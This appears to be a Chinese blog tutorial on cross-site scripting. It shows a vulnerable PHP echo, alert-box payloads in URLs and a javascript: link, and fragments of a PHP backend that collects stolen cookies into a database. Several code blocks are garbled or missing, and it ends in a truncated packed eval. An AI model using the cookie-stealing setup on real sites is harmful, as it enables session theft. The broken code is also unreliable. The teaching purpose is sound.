什么是XSS
XSS 意为跨站脚本攻击(Cross Site Scripting),缩写应该是CSS,但是已经有了一个层叠样式表(Cascading Style Sheets),所以就叫它XSS了。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的,最常见的就是拿到攻击者的 Cookie 然后就可以登录别人的账号了。
XSS实例
最简单的形式就是从URL中直接插入恶意的 JavaScript 代码,最简单的实例如下:
1
2
3
4
$input = $_GET['info'];
echo $input;
服务端接收到了数据并执行了输出操作。这样的话就完全可以利用了,你可以向参数输入任意代码。 这个服务端的测试用例网址是 http://res.cuiqingcai.com/hack/xss1.php 你可以直接在参数后面加入 JavaScript 代码,例如 http://res.cuiqingcai.com/hack/xss1.php?info=%3Cscript%3Ealert(%27hello%27)%3C/script%3E%3C/script%3E) 直接打开便实现了最简单的 XSS 攻击,不过有的浏览器对此种攻击方式执行了过滤,例如 Chrome, Firefox。有的未执行过滤的浏览器是可以正常演示的。正常的结果应该是输出一个提示框。 接下来再演示另一种攻击方式。 测试网址是 http://res.cuiqingcai.com/hack/xss2.html 源代码如下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
TEST XSSfunction test(){
var text = document.getElementById('text').value;
var new_text = 'test';
console.log(new_text);
document.getElementById('content').innerHTML = new_text;
}
现在有一个输入框,点击按钮之后会将输入框的内容提取出来,然后拼凑到超链接标签里。在这里也可以执行XSS攻击。 比如输入
1
javascript:void(0)" οnclick=alert('ssss') "
提交之后会出现一个超链接,点击之后就可以执行你输入的代码,这次就弹出一个输入框。 当然你也可以插入一张图片,用 onerror 属性定义方法
1
$mysqli = new mysqli("localhost", "root", "", "evil");
echo "Failed to connect to MySQL: (" . $mysqli->connect_errno . ") " . $mysqli->connect_error;
$time = date("Y-m-d H:i:s", time());
$items = explode(";", $content);
$js .= ("document.cookie='".trim($item)."';");
$stmt->bind_param("ssss", $url, $content, $time, $js);
echo "Collected Your Cookie
" ;
echo 'url:', $url, '
', 'content:', $content;
其实就是获取了url,还有cookie内容,然后插入了数据库保存起来。 这样,每成功一个XSS,就可以成功捕获到某个网站的Cookie。
eval(function(p,a,c,k,e,d){e=function(c){return(c